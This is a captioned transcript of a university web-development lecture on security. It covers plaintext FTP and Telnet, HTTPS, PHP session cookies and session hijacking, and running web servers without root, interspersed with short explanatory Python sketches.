1
00:00:00,506 --> 00:00:09,546
[ Silence ]

2
00:00:10,046 --> 00:00:10,256
>> All right.

3
00:00:10,256 --> 00:00:10,806
Welcome back.

4
00:00:10,866 --> 00:00:12,696
This is Lecture Eight, Security.

5
00:00:12,906 --> 00:00:14,846
Only one lecture
to go after this.

6
00:00:14,846 --> 00:00:17,466
So summer is almost over
and tonight we start talking

7
00:00:17,466 --> 00:00:19,906
about all of the dangerous
things you might currently be

8
00:00:19,906 --> 00:00:22,706
doing in your code, specifically
in the context of PHP,

9
00:00:22,706 --> 00:00:26,296
and MySQL, as well
as in JavaScript.

10
00:00:26,296 --> 00:00:29,576
So of the topics we've discussed
thus far this semester what are

11
00:00:29,576 --> 00:00:33,046
some of the possible threats
that we've encountered,

12
00:00:33,206 --> 00:00:36,086
possible security
issues we've encountered?

13
00:00:36,966 --> 00:00:37,786
What comes to mind?

14
00:00:38,986 --> 00:00:39,336
Ben?

15
00:00:39,336 --> 00:00:43,036
>> SQL injection attacks
when typing in scripts

16
00:00:43,036 --> 00:00:44,076
as [inaudible] parameters.

17
00:00:44,076 --> 00:00:44,566
>> Okay, good.

18
00:00:44,566 --> 00:00:45,766
So SQL injection attacks

19
00:00:46,016 --> 00:00:48,206
which we'll see a
concrete example of today.

20
00:00:48,396 --> 00:00:52,086
Typing in Script, JavaScript
code into like a form

21
00:00:52,216 --> 00:00:56,766
and accidentally tricking
the user into displaying

22
00:00:56,766 --> 00:00:59,136
that on some webpage or
executing that on some webpage.

23
00:00:59,136 --> 00:01:00,746
We'll see an example
of that as well.

24
00:01:01,476 --> 00:01:02,966
Other possible threats?

25
00:01:10,046 --> 00:01:11,686
Isaac is looking to
Axle for an answer.

26
00:01:12,756 --> 00:01:13,496
What do you got Axle?

27
00:01:13,936 --> 00:01:15,966
>> It's not really
a possible threat

28
00:01:15,966 --> 00:01:18,836
but if you don't encrypt your
data over HTTPS it's going

29
00:01:18,836 --> 00:01:20,076
to be open for anybody to see

30
00:01:20,116 --> 00:01:22,066
and hijack your session
and all of that.

31
00:01:22,066 --> 00:01:22,586
>> Okay, good.

32
00:01:22,586 --> 00:01:25,876
So back in lecture zero we
talked a bit about HTTPS,

33
00:01:25,876 --> 00:01:28,786
or SSL, and how not using it
obviously means your traffic is

34
00:01:28,786 --> 00:01:31,766
completely unencrypted and what
the implications of that are,

35
00:01:31,766 --> 00:01:34,026
particularly for what
kind of information?

36
00:01:34,546 --> 00:01:37,996
What kind of information
is at risk

37
00:01:37,996 --> 00:01:42,076
if you're using HTTP
versus HTTPS?

38
00:01:42,266 --> 00:01:42,356
Yeah?

39
00:01:43,186 --> 00:01:53,176
>> Well your data is really
sent unencrypted so anybody

40
00:01:53,176 --> 00:01:55,286
on the same network
can see that connection

41
00:01:55,286 --> 00:01:58,396
and get all the information
that's sent.

42
00:01:58,396 --> 00:01:58,786
>> Okay, good.

43
00:01:58,786 --> 00:02:02,146
So anyone on the same
network can sniff and read any

44
00:02:02,146 --> 00:02:04,336
of the data that
you're transmitting,

45
00:02:04,336 --> 00:02:08,606
and frankly on the
entire Internet, right?

46
00:02:08,606 --> 00:02:11,366
Anyone between you,
point A, and say Amazon,

47
00:02:11,426 --> 00:02:14,106
point B. If Amazon's not using
HTTPS at all, in theory anyone

48
00:02:14,106 --> 00:02:15,776
with access to any
of the various routers

49
00:02:15,776 --> 00:02:19,026
in between point A and B
could sniff that traffic.

50
00:02:19,026 --> 00:02:19,996
So it doesn't just have

51
00:02:19,996 --> 00:02:22,256
to be wireless connectivity
nearby you.

52
00:02:22,256 --> 00:02:24,676
All right, so let's try to
flesh some of these things out

53
00:02:24,676 --> 00:02:27,266
and most of you probably
aren't familiar

54
00:02:27,486 --> 00:02:28,966
with a protocol called Telnet.

55
00:02:28,966 --> 00:02:32,006
You might be familiar with
a protocol called FTP.

56
00:02:33,036 --> 00:02:37,866
Does someone want to
pluck off one, or either,

57
00:02:38,026 --> 00:02:42,786
or both of these --
what these protocols,

58
00:02:42,786 --> 00:02:45,316
Telnet and FTP are
or are used for?

59
00:02:45,316 --> 00:02:45,776
Isaac?

60
00:02:45,776 --> 00:02:48,326
>> Well, I know FTP, like
file transfer protocol,

61
00:02:48,326 --> 00:02:53,386
means to send like files
from one computer to another.

62
00:02:53,386 --> 00:02:55,706
>> Good. So, file
transfer protocol is FTP,

63
00:02:55,926 --> 00:02:57,936
it's used to transfer
programs, files,

64
00:02:57,936 --> 00:02:59,706
anything from one
computer to another.

65
00:02:59,706 --> 00:03:01,736
There's a gotcha with it,

66
00:03:01,736 --> 00:03:05,186
it's that it's completely
unencrypted,

67
00:03:05,186 --> 00:03:08,516
and yet many webhosts
support only FTP,

68
00:03:08,516 --> 00:03:13,176
or many webhosts offer FTP but
don't really warn customers

69
00:03:13,176 --> 00:03:15,836
of the potential
concerns with it.

70
00:03:16,086 --> 00:03:18,426
So what does it mean concretely

71
00:03:18,426 --> 00:03:20,736
if you're transferring
stuff via FTP?

72
00:03:20,736 --> 00:03:23,486
Right, if you have a webhosting
account, maybe it's DreamHost,

73
00:03:23,656 --> 00:03:24,836
maybe it's someone else,

74
00:03:24,986 --> 00:03:34,206
by nature of the content you're
uploading you want the whole

75
00:03:34,206 --> 00:03:37,866
world to be able to see
your GIF's, and JPEG's,

76
00:03:38,186 --> 00:03:40,136
and HTML files anyway.

77
00:03:40,136 --> 00:03:43,646
So what's the big deal if moving
the files from your computer

78
00:03:43,646 --> 00:03:46,886
or even your appliance
to this remote server is

79
00:03:46,886 --> 00:03:47,596
all unencrypted?

80
00:03:47,596 --> 00:03:47,866
Axle?

81
00:03:47,956 --> 00:03:51,166
>> Well, say that you
send more important stuff

82
00:03:51,166 --> 00:03:51,886
than just images.

83
00:03:51,886 --> 00:03:54,466
Say you send the PHP
configuration file.

84
00:03:54,766 --> 00:03:54,966
>> Good.

85
00:03:55,186 --> 00:03:57,866
>> It contains the database
name, username, password.

86
00:03:57,866 --> 00:04:01,006
And once somebody has that
they could essentially log

87
00:04:01,006 --> 00:04:03,346
into your database
and get everything.

88
00:04:03,346 --> 00:04:04,456
>> Yeah, absolutely.

89
00:04:04,456 --> 00:04:05,866
So if you're sending more

90
00:04:05,936 --> 00:04:12,136
than just publicly accessible
content like, HTML files, JPEGS,

91
00:04:12,136 --> 00:04:16,896
images and the like, but
rather you're sending things

92
00:04:17,116 --> 00:04:20,746
like your PHP code, which has
your intellectual property,

93
00:04:20,826 --> 00:04:22,266
or your configuration
files for PHP,

94
00:04:22,266 --> 00:04:24,496
which might have your database
usernames and passwords,

95
00:04:24,496 --> 00:04:25,906
and God knows what else,

96
00:04:25,906 --> 00:04:29,456
well now you're sending
this completely in the clear

97
00:04:29,456 --> 00:04:33,296
for anyone on the Internet,
or anyone in Starbucks,

98
00:04:33,296 --> 00:04:37,706
anyone between point A and
B to potentially intercept.

99
00:04:37,706 --> 00:04:40,946
And even worse than that, what
also is going in the clear

100
00:04:40,946 --> 00:04:43,846
if you're not using any kind
of encryption when you use FTP?

101
00:04:43,846 --> 00:04:44,136
Axle?

102
00:04:44,136 --> 00:04:47,486
>> I think your
login credentials

103
00:04:47,536 --> 00:04:48,806
for the actual server.

104
00:04:49,006 --> 00:04:49,596
>> Exactly.

105
00:04:49,886 --> 00:04:52,746
Which is the absolute worst
part of the whole story.

106
00:04:53,326 --> 00:04:55,036
Which is that your username

107
00:04:55,036 --> 00:04:59,386
and your password are sent
completely in the clear,

108
00:04:59,386 --> 00:05:01,866
which means who cares if
everything else is sent

109
00:05:01,866 --> 00:05:04,446
in the clear, anyone else can
just log in to the server

110
00:05:04,446 --> 00:05:08,026
after the fact and do whatever
they want with your account.
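
To make the point about credentials concrete, here is a minimal sketch, not from the lecture, of what an eavesdropper sees during an FTP login. FTP sends its USER and PASS commands as plain text lines; the username and password below are made-up placeholders, and the function names are hypothetical.

```python
# Sketch: FTP control-channel commands are plain ASCII lines ending in CRLF.
# The credentials used here are hypothetical placeholders.

def ftp_login_bytes(username: str, password: str) -> bytes:
    """Return the bytes an FTP client sends to log in (no encryption)."""
    return f"USER {username}\r\nPASS {password}\r\n".encode("ascii")


def sniff_credentials(captured: bytes) -> dict:
    """Recover what anyone who captured those bytes could read."""
    found = {}
    for line in captured.decode("ascii").split("\r\n"):
        command, _, argument = line.partition(" ")
        if command in ("USER", "PASS"):
            found[command] = argument
    return found


wire = ftp_login_bytes("jharvard", "crimson")
print(sniff_credentials(wire))  # {'USER': 'jharvard', 'PASS': 'crimson'}
```

Nothing here needs to be decrypted or guessed, which is why an encrypted protocol such as SFTP is preferable.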

111
00:05:08,026 --> 00:05:09,826
So in short, if you
end up signing

112
00:05:09,826 --> 00:05:12,066
up for some commercial webhost,

113
00:05:12,066 --> 00:05:14,456
if you end up supporting
your own server locally,

114
00:05:14,716 --> 00:05:17,296
there is no reason today to
use FTP unless it's maybe

115
00:05:17,296 --> 00:05:19,146
on a local isolated network.

116
00:05:19,256 --> 00:05:22,016
But even then it's
just bad practice

117
00:05:22,016 --> 00:05:26,926
because you can use quite
easily an encrypted protocol,

118
00:05:26,926 --> 00:05:28,496
one of which we're about to see,

119
00:05:28,496 --> 00:05:31,296
one of which isn't mentioned
here, but it's called SFTP,

120
00:05:31,296 --> 00:05:34,076
secure file transfer protocol,
which actually has encryption.

121
00:05:34,076 --> 00:05:36,076
And these days there is
really no good reason not

122
00:05:36,076 --> 00:05:36,916
to use something like SFTP.

123
00:05:36,916 --> 00:05:38,636
So Telnet is a little
more dated,

124
00:05:38,636 --> 00:05:40,516
but it's still used
for various things.

125
00:05:40,516 --> 00:05:43,646
It's a protocol that's used
to control one computer

126
00:05:43,646 --> 00:05:45,156
from another, whereby if you
think about your terminal window

127
00:05:45,186 --> 00:05:45,846
within the CS50 appliance.

128
00:05:45,876 --> 00:05:46,926
When you open a terminal
you have a black

129
00:05:46,956 --> 00:05:47,586
and white command prompt.

130
00:05:47,616 --> 00:05:49,176
Well Telnet is a protocol that
allows you to access a black

131
00:05:49,206 --> 00:05:50,796
and white command prompt like
that but from another computer.

132
00:05:50,826 --> 00:05:52,296
So I could be sitting at home
and I could use Telnet back

133
00:05:52,326 --> 00:05:53,376
in the day to connect
to a Harvard server

134
00:05:53,406 --> 00:05:54,606
and then have a blinking
prompt on my window --

135
00:05:54,636 --> 00:05:55,476
on my screen, but that computer

136
00:05:55,506 --> 00:05:56,976
that I'm actually controlling
is somewhere else on campus.

137
00:05:57,006 --> 00:05:58,266
Or conversely, in theory
you could telnet, as a verb,

138
00:05:58,296 --> 00:05:59,496
from your own laptop to
the appliance in order

139
00:05:59,526 --> 00:06:01,086
to get a prompt, but these days
you would instead use something

140
00:06:01,116 --> 00:06:01,296
called SSH.

141
00:06:01,326 --> 00:06:02,826
Indeed the appliance does not
have Telnet support enabled,

142
00:06:02,856 --> 00:06:04,146
you cannot connect to it
insecurely via Telnet,

143
00:06:04,176 --> 00:06:05,466
rather you have to use SSH,
which encrypts the traffic.

144
00:06:05,496 --> 00:06:07,026
Even if you're just trying to
connect from your Mac or PC

145
00:06:07,056 --> 00:06:08,526
to the appliance in order to
pull up that terminal window.

146
00:06:08,556 --> 00:06:10,026
And though I keep describing
it as a black and white window,

147
00:06:10,056 --> 00:06:11,616
of course some of you might have
noticed that it supports color

148
00:06:11,646 --> 00:06:12,456
in theory with various programs,

149
00:06:12,486 --> 00:06:13,776
but it's still a command
line interface ultimately.

150
00:06:13,806 --> 00:06:14,946
So, HTTP, this one we've
definitely talked about.

151
00:06:14,976 --> 00:06:16,056
What kinds of things
are sent in the clear

152
00:06:16,086 --> 00:06:17,136
when you're using just
HTTP and not HTTPS?

153
00:06:17,166 --> 00:06:17,976
What kind of stuff is at risk?

154
00:06:23,116 --> 00:06:23,996
How about Jack?

155
00:06:23,996 --> 00:06:28,316
You have the look of
an answer on your face.

156
00:06:28,316 --> 00:06:29,546
>> [Inaudible] together here.

157
00:06:30,276 --> 00:06:35,136
Put me on the spot here.

158
00:06:35,506 --> 00:06:37,006
>> I know, I have time.

159
00:06:37,036 --> 00:06:37,496
It's okay.

160
00:06:38,936 --> 00:06:41,496
Come on. We can do it.

161
00:06:41,496 --> 00:06:44,046
HTTP, you have -- it's
completely sent in the clear.

162
00:06:44,206 --> 00:06:45,246
It's used by a lot of websites.

163
00:06:45,246 --> 00:06:47,596
So what kind of stuff
might be sent in the clear?

164
00:06:47,596 --> 00:06:48,086
[ Inaudible Speaker ]

165
00:06:48,086 --> 00:06:50,446
Okay. Session, what's
a session though?

166
00:06:50,596 --> 00:06:53,976
>> The very same file
that is on your computer

167
00:06:53,976 --> 00:06:56,516
that tells a website
or a webhost

168
00:06:56,746 --> 00:06:59,236
that you are the one
currently logged into them.

169
00:06:59,346 --> 00:06:59,656
>> Okay.

170
00:06:59,656 --> 00:07:03,076
>> And someone can steal
your session and then go

171
00:07:03,076 --> 00:07:05,086
and pretty much log in
as if they were you.

172
00:07:05,236 --> 00:07:05,756
>> Okay, good.

173
00:07:05,756 --> 00:07:08,106
So recall that we discussed this
sort of higher level concept

174
00:07:08,106 --> 00:07:10,606
of a session that's
incarnated in PHP

175
00:07:10,606 --> 00:07:13,186
with the superglobal
called $_SESSION

176
00:07:13,516 --> 00:07:16,596
that it gives you the illusion
of having really a sort

177
00:07:16,596 --> 00:07:21,146
of persistent connection to some
user even though they might be

178
00:07:21,146 --> 00:07:23,186
visiting you with a
browser every few seconds

179
00:07:23,186 --> 00:07:24,006
or every few minutes.

180
00:07:24,066 --> 00:07:25,606
Nonetheless, you're
still provided

181
00:07:25,606 --> 00:07:28,436
with the storage even though
HTTP itself is stateless.

182
00:07:28,516 --> 00:07:31,226
Now you're not technically
transferring the session back

183
00:07:31,226 --> 00:07:33,626
and forth across the
Internet via HTTP.

184
00:07:34,016 --> 00:07:35,476
What are you actually
transferring

185
00:07:35,476 --> 00:07:39,746
across the Internet via HTTP
that enables sessions to exist?

186
00:07:40,276 --> 00:07:43,366
>> It's some sort of session ID
which is a really long stream

187
00:07:43,366 --> 00:07:46,246
of letters and numbers
you can't really guess.

188
00:07:47,056 --> 00:07:47,386
>> Perfect.

189
00:07:47,386 --> 00:07:49,346
So it's a really long
sequence of letters and numbers

190
00:07:49,346 --> 00:07:51,136
and this is specifically
an example of what?

191
00:07:51,756 --> 00:07:59,346
The session ID is implemented
with what feature of HTTP?

192
00:07:59,516 --> 00:08:03,746
Or how -- where is this sent?

193
00:08:03,816 --> 00:08:04,826
Let's see, someone else?

194
00:08:06,296 --> 00:08:07,856
So like I've totally -- I agree

195
00:08:07,856 --> 00:08:11,066
that HTTP involves sending
this unique identifier

196
00:08:11,066 --> 00:08:14,056
that somehow implements
sessions but how?

197
00:08:14,056 --> 00:08:15,726
If we opened up that
virtual envelope

198
00:08:15,726 --> 00:08:20,616
where in the contents inside
would it be -- this ID?

199
00:08:21,706 --> 00:08:23,706
Or what's it an example of?

200
00:08:25,836 --> 00:08:27,556
No one wants to make
eye contact.

201
00:08:27,556 --> 00:08:27,846
Axle?

202
00:08:27,846 --> 00:08:32,806
>> I mean sending --
it's sent in the headers

203
00:08:32,946 --> 00:08:34,936
as the session cookie.

204
00:08:35,326 --> 00:08:35,846
>> Okay, good.

205
00:08:35,896 --> 00:08:38,016
So it's sent in the
headers as a session cookie,

206
00:08:38,016 --> 00:08:40,516
or just as a more general
notion of a cookie.

207
00:08:40,696 --> 00:08:43,466
Right? There's a Set-Cookie
header that a server sends

208
00:08:43,466 --> 00:08:46,786
to a browser and the Set-Cookie
header allows you to set a value

209
00:08:46,786 --> 00:08:49,336
for some key and in the
world of PHP that key happens

210
00:08:49,626 --> 00:08:53,206
to be called by default
PHPSESSID, in all caps,

211
00:08:53,636 --> 00:08:54,876
but that's totally arbitrary.

212
00:08:55,236 --> 00:08:59,656
And the server meanwhile sets
a value for that key which is,

213
00:08:59,656 --> 00:09:02,446
as Jack says, a big random
sequence of letters and numbers,

214
00:09:02,686 --> 00:09:06,366
and then every time the browser
revisits that same website

215
00:09:06,526 --> 00:09:08,986
that it originally sent
it, the Set-Cookie header,

216
00:09:09,306 --> 00:09:11,776
that browser is essentially
reminding the server,

217
00:09:11,956 --> 00:09:12,596
"I am this ID.

218
00:09:12,596 --> 00:09:14,186
I am this ID."
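
The round trip just described can be sketched as follows. This is an illustration under stated assumptions, not PHP's actual implementation: the ID is generated with Python's `secrets` module rather than by PHP, and only the cookie name PHPSESSID comes from the lecture.

```python
import secrets
from http.cookies import SimpleCookie

# Server side: make up a long random session ID (assumption: 32 hex characters)
# and hand it to the browser in a Set-Cookie header.
session_id = secrets.token_hex(16)
response_cookie = SimpleCookie()
response_cookie["PHPSESSID"] = session_id
set_cookie_header = response_cookie.output()  # "Set-Cookie: PHPSESSID=<id>"

# Browser side: on every later request it echoes the value back in a Cookie header.
cookie_header = f"Cookie: PHPSESSID={session_id}"

# Server side again: parse the Cookie header to learn which session this is.
request_cookie = SimpleCookie()
request_cookie.load(cookie_header.split(": ", 1)[1])
returned_id = request_cookie["PHPSESSID"].value

print(set_cookie_header)
print(returned_id == session_id)  # True
```

The cookie carries only the identifier; whatever is stored in the session itself stays on the server.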

219
00:09:14,186 --> 00:09:16,816
And weeks ago we kind of likened
it to a handstamp that you get

220
00:09:16,816 --> 00:09:18,646
at a club or an amusement park.

221
00:09:18,826 --> 00:09:22,256
So that it permits you access
even after your first time

222
00:09:22,256 --> 00:09:23,266
through that gate
so that you can kind

223
00:09:23,266 --> 00:09:24,336
of come and go as you please.

224
00:09:24,456 --> 00:09:26,916
Because that handstamp is sort
of reminding the guy at the gate

225
00:09:26,916 --> 00:09:28,406
that you have been here before

226
00:09:28,406 --> 00:09:30,276
and in this case it's
being even more specific,

227
00:09:30,276 --> 00:09:33,296
it's reminding him who you
actually are, not in terms

228
00:09:33,296 --> 00:09:36,236
of your identity but in terms
of your unique identifier.

229
00:09:36,506 --> 00:09:41,896
So HTTP is dangerous in terms
of its lack of encryption

230
00:09:41,896 --> 00:09:44,336
because the session ID, if
it's being sent back and forth

231
00:09:44,336 --> 00:09:46,926
across the wire, it doesn't
contain itself private

232
00:09:46,926 --> 00:09:50,476
information, it doesn't contain
your username, your password,

233
00:09:50,476 --> 00:09:51,496
your credit card information.

234
00:09:51,496 --> 00:09:54,386
Because again, as Jack said,
it's a big random number

235
00:09:54,796 --> 00:09:57,386
or big random sequence
of letters and numbers,

236
00:09:57,896 --> 00:10:02,106
but the catch is if you're
not encrypting it what's the

237
00:10:02,106 --> 00:10:04,876
implication if someone sniffs
it and steals it somehow

238
00:10:04,936 --> 00:10:05,976
by listening to your traffic?

239
00:10:06,206 --> 00:10:06,416
Axle?

240
00:10:06,416 --> 00:10:08,806
>> Well they can take
your session and pretend

241
00:10:12,756 --> 00:10:15,056
that their computer is
actually my computer running the

242
00:10:15,296 --> 00:10:15,976
same session.

243
00:10:15,976 --> 00:10:16,276
>> Exactly.

244
00:10:16,276 --> 00:10:20,156
>> [Inaudible] website, that
website is going to recognize

245
00:10:20,156 --> 00:10:23,446
that website and it's
going to say, "Hey,

246
00:10:23,446 --> 00:10:24,866
you're already logged in."

247
00:10:24,866 --> 00:10:28,896
It's going to log
them in and it's going

248
00:10:28,896 --> 00:10:30,966
to display the login -- the
secure side of the page.

249
00:10:30,966 --> 00:10:31,836
>> Exactly.

250
00:10:31,926 --> 00:10:33,566
Right. If all it takes
to remind a server

251
00:10:33,566 --> 00:10:35,606
who you are is presentation
of this big random sequence

252
00:10:35,606 --> 00:10:38,256
of letters and numbers and
a bad guy is able to steal

253
00:10:38,256 --> 00:10:39,726
that sequence of letters
and numbers from you,

254
00:10:39,726 --> 00:10:41,906
by just listening in on
your traffic wirelessly,

255
00:10:41,906 --> 00:10:44,806
or even poking around on your
computer, and then copying

256
00:10:44,806 --> 00:10:46,586
that big random sequence
of letters and numbers.

257
00:10:46,776 --> 00:10:49,046
And then he is smart
enough to know how

258
00:10:49,046 --> 00:10:53,526
to configure their computer to
transmit that same cookie value

259
00:10:53,526 --> 00:10:56,856
with a cookie header, well he or
she can just pretend to be you

260
00:10:56,856 --> 00:10:59,146
and the server doesn't
really know the difference.
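
A minimal sketch of why the server cannot tell the difference, assuming a hypothetical in-memory session store keyed only by the cookie value (the ID, the user name, and `handle_request` are all made up for illustration):

```python
# Sketch: the server's only evidence of who you are is the cookie value.
sessions = {"a1b2c3d4e5f6": {"user": "axle", "logged_in": True}}


def handle_request(cookie_value: str) -> str:
    """Look up the session by ID; nothing else about the sender is checked."""
    session = sessions.get(cookie_value)
    if session and session["logged_in"]:
        return f"Welcome back, {session['user']}"
    return "Please log in"


victim_reply = handle_request("a1b2c3d4e5f6")    # the real user's browser
attacker_reply = handle_request("a1b2c3d4e5f6")  # someone who sniffed the cookie
stranger_reply = handle_request("not-a-real-id")

print(victim_reply == attacker_reply)  # True
print(stranger_reply)                  # Please log in
```

Guessing the ID is impractical, but over plain HTTP nobody has to guess it: it can simply be read off the wire.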

261
00:10:59,146 --> 00:11:01,156
So we'll come back to how
we might mitigate this,

262
00:11:01,336 --> 00:11:04,906
but that's one of the key
shortcomings of just using HTTP

263
00:11:04,906 --> 00:11:06,966
for anything sensitive,
not to mention the fact

264
00:11:06,966 --> 00:11:09,256
that if you're submitting a
form that has your username,

265
00:11:09,256 --> 00:11:11,156
your password, your
credit card number,

266
00:11:11,156 --> 00:11:13,886
if the site is itself
not using HTTPS then all

267
00:11:13,886 --> 00:11:16,206
of that stuff too is
going in the clear,

268
00:11:16,206 --> 00:11:18,476
and so more private information
could indeed be taken

269
00:11:18,476 --> 00:11:19,046
in that case.

270
00:11:19,336 --> 00:11:21,816
MySQL meanwhile is similar
in spirit to the rest

271
00:11:21,816 --> 00:11:24,436
of these protocols in that
it itself is not encrypted.

272
00:11:24,626 --> 00:11:27,646
Recall we talked briefly
a couple lectures ago

273
00:11:27,876 --> 00:11:30,656
that generally you want
your MySQL server sitting

274
00:11:30,656 --> 00:11:33,336
on the same network as your
web servers, even if it's

275
00:11:33,336 --> 00:11:34,696
on a different physical machine

276
00:11:34,966 --> 00:11:37,396
so that your traffic
is only going

277
00:11:37,396 --> 00:11:39,616
over your own local
network and not connecting

278
00:11:39,616 --> 00:11:42,736
to some remote database
server elsewhere.

279
00:11:43,706 --> 00:11:45,656
So, what are some

280
00:11:45,656 --> 00:11:47,846
of the problems we did
solve though thus far?

281
00:11:47,846 --> 00:11:52,026
Well, recall there's this
feature in the appliance,

282
00:11:52,326 --> 00:11:55,726
which I think I mentioned ever
so briefly, or maybe not even,

283
00:11:55,726 --> 00:11:57,206
suPHP, substitute user PHP.

284
00:11:57,206 --> 00:11:59,676
Oh we did have this
conversation.

285
00:11:59,676 --> 00:12:03,176
Recall that one of the problems
with a web server in general is

286
00:12:03,176 --> 00:12:08,286
that if you are running that web
server as root, that's very bad,

287
00:12:08,286 --> 00:12:09,946
and thankfully it's
rarely done these days.

288
00:12:09,946 --> 00:12:13,476
Why is it bad to run a web
server, which is just a program

289
00:12:13,476 --> 00:12:14,506
that serves up webpages,

290
00:12:14,856 --> 00:12:16,966
as the administrator
account, so-called root?

291
00:12:16,966 --> 00:12:17,176
Jack?

292
00:12:17,526 --> 00:12:23,386
>> If anyone ever breaks into
the account via some PHP hack

293
00:12:23,386 --> 00:12:26,106
or something they can literally
wreck anything on the server.

294
00:12:26,106 --> 00:12:26,626
>> Exactly.

295
00:12:26,626 --> 00:12:28,066
>> [Inaudible] has root access.

296
00:12:28,246 --> 00:12:28,666
>> Perfect.

297
00:12:28,666 --> 00:12:31,496
So if the web server is running
with administrative privileges

298
00:12:31,496 --> 00:12:33,356
as the so-called root user

299
00:12:33,536 --> 00:12:37,236
and that web server is
executing buggy code, that you

300
00:12:37,236 --> 00:12:39,266
or someone else wrote,
buggy in the sense

301
00:12:39,266 --> 00:12:40,936
that there's something
stupid in there

302
00:12:41,196 --> 00:12:43,536
that lets a user
execute some command.

303
00:12:43,776 --> 00:12:47,266
The scary part here is that
who's going to be executing

304
00:12:47,266 --> 00:12:51,326
that command if a bad guy is
taking advantage of that bug

305
00:12:51,326 --> 00:12:55,476
or vulnerability in the software
is going to be executed as root.

306
00:12:55,476 --> 00:12:57,526
And root unfortunately
generally has privileges

307
00:12:57,526 --> 00:13:00,796
to delete everything, download
anything, change usernames,

308
00:13:00,796 --> 00:13:02,226
passwords, install anything.

309
00:13:02,226 --> 00:13:04,496
It's just there's
really no constraints

310
00:13:04,496 --> 00:13:05,616
on that particular user.

311
00:13:05,616 --> 00:13:08,136
So, running anything as root
is generally bad because again,

312
00:13:08,136 --> 00:13:11,216
if what root is running is
vulnerable to being taken

313
00:13:11,216 --> 00:13:12,906
over by a bad guy, or tricked

314
00:13:12,906 --> 00:13:14,946
into executing some
arbitrary command,

315
00:13:15,376 --> 00:13:17,336
well then that command's
going to be run as root and at

316
00:13:17,336 --> 00:13:19,766
that point who knows what
the bad guy has done

317
00:13:19,806 --> 00:13:21,426
to or with your system.

318
00:13:22,166 --> 00:13:23,236
Axle, question, comment?

319
00:13:24,176 --> 00:13:28,106
No? Okay. All right, so we can
fix this by running a web server

320
00:13:28,106 --> 00:13:29,476
under a different username.

321
00:13:29,866 --> 00:13:33,886
Something like Apache, or
HTTPD, or some systems run it

322
00:13:33,886 --> 00:13:35,806
as literally an account
called "nobody."

323
00:13:36,056 --> 00:13:37,596
And in all of those
cases the user

324
00:13:37,596 --> 00:13:40,406
in question does not have
administrative privileges.

325
00:13:40,626 --> 00:13:41,926
So the worst thing
that can happen

326
00:13:41,926 --> 00:13:45,036
if you're running your web
server as Apache or as HTTPD,

327
00:13:45,036 --> 00:13:48,606
as the appliance does,
is that the only account

328
00:13:49,206 --> 00:13:50,786
that can be compromised,

329
00:13:51,066 --> 00:13:54,366
the only account whose files
can be deleted, the only account

330
00:13:54,366 --> 00:14:01,136
that can have some damage
done to it is the HTTPD user.

331
00:14:01,136 --> 00:14:03,866
Now that's not great because
that means a bad guy could take

332
00:14:03,866 --> 00:14:06,366
down your entire web
server, or delete the logs

333
00:14:06,366 --> 00:14:11,146
for the web server, or any
files that the HTTPD user owns,

334
00:14:11,466 --> 00:14:14,266
but at least that's one user you
can just remove the whole web

335
00:14:14,266 --> 00:14:16,436
server account, you can
blow away all those files

336
00:14:16,716 --> 00:14:18,186
because root hasn't
been compromised

337
00:14:18,186 --> 00:14:19,226
and you can reinstall.

338
00:14:19,436 --> 00:14:20,276
But there is a problem.

339
00:14:20,276 --> 00:14:24,996
If your files are being
read and executed by Apache,

340
00:14:25,606 --> 00:14:27,156
the web server, what do you have

341
00:14:27,156 --> 00:14:31,216
to chmod your files
to be in that case?

342
00:14:31,656 --> 00:14:35,296
If you are someone like J.
Harvard, or Axle, or Isaac,

343
00:14:35,296 --> 00:14:38,726
if you have your own user ID and
yet the web server is running

344
00:14:38,726 --> 00:14:41,516
as a different username,
like HTTPD, what do you have

345
00:14:41,516 --> 00:14:43,626
to set the permissions
on your own files

346
00:14:43,626 --> 00:14:45,206
to for this to all work?

347
00:14:45,776 --> 00:14:47,716
Previously it didn't
matter because root can read

348
00:14:47,716 --> 00:14:50,416
and write any file so it doesn't
matter what the permissions are.

349
00:14:50,996 --> 00:14:51,986
He has unfettered access.

350
00:14:53,106 --> 00:14:54,326
But HTTPD wouldn't.

351
00:14:54,546 --> 00:14:56,466
So what do you have to
chmod your files usually?

352
00:14:56,466 --> 00:14:58,746
And chmod remember is the
command for changing the mode

353
00:14:58,746 --> 00:15:03,976
of a file which means the
permission, 644, 711, 700,

354
00:15:03,976 --> 00:15:06,496
A plus R, A plus X,
whatever the case may be.
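
For anyone who does not remember the codes, here is a small sketch that decodes the three numeric modes just mentioned into the rwx strings that `ls -l` prints. The helper name `describe` is hypothetical; `stat.filemode` is part of Python's standard library.

```python
import stat


def describe(mode: int) -> str:
    """Render an octal permission mode the way `ls -l` shows a regular file."""
    return stat.filemode(stat.S_IFREG | mode)


for mode in (0o644, 0o711, 0o700):
    print(oct(mode), describe(mode))
# 0o644 -rw-r--r--
# 0o711 -rwx--x--x
# 0o700 -rwx------
```

Each digit covers owner, group, and everyone else in turn, with read worth 4, write worth 2, and execute worth 1.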

355
00:15:07,076 --> 00:15:11,116
And don't worry if you
don't remember the codes,

356
00:15:11,156 --> 00:15:14,266
but in words what kind of
permissions do your files need?

357
00:15:14,266 --> 00:15:14,406
Yeah?

358
00:15:14,526 --> 00:15:19,066
>> This is probably
not the best solution

359
00:15:19,066 --> 00:15:22,236
but you can set all plus read
on a group of all the users

360
00:15:22,306 --> 00:15:25,466
that are allowed
access, including Apache.

361
00:15:25,466 --> 00:15:26,116
>> Okay, say that once more.

362
00:15:26,246 --> 00:15:26,896
Set what to read?

363
00:15:27,226 --> 00:15:28,446
>> All plus read.

364
00:15:28,836 --> 00:15:30,016
>> Oh, okay.

365
00:15:30,016 --> 00:15:34,736
>> On the group -- on
a group, like students

366
00:15:34,886 --> 00:15:35,836
or [inaudible] on a web server.

367
00:15:35,836 --> 00:15:36,546
>> Okay, good.

368
00:15:36,776 --> 00:15:38,896
>> [Inaudible] all the accounts
that are allowed to access

369
00:15:39,026 --> 00:15:40,336
that file, including Apache.

370
00:15:40,436 --> 00:15:40,936
>> Okay, good.

371
00:15:40,936 --> 00:15:42,656
So in theory you could
put all of the users

372
00:15:42,696 --> 00:15:45,626
into a group called students
or something like that,

373
00:15:45,906 --> 00:15:47,886
and make sure that Apache
is in the same group,

374
00:15:48,196 --> 00:15:51,386
and then you can give the group
read access, and the command

375
00:15:51,386 --> 00:15:54,886
for this, recall, is not A
plus R, but would be G plus R

376
00:15:54,886 --> 00:15:58,116
in this case, chmod G plus R,
group plus readability, right,

377
00:15:58,556 --> 00:16:01,146
to whatever file or
directory is in question.
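
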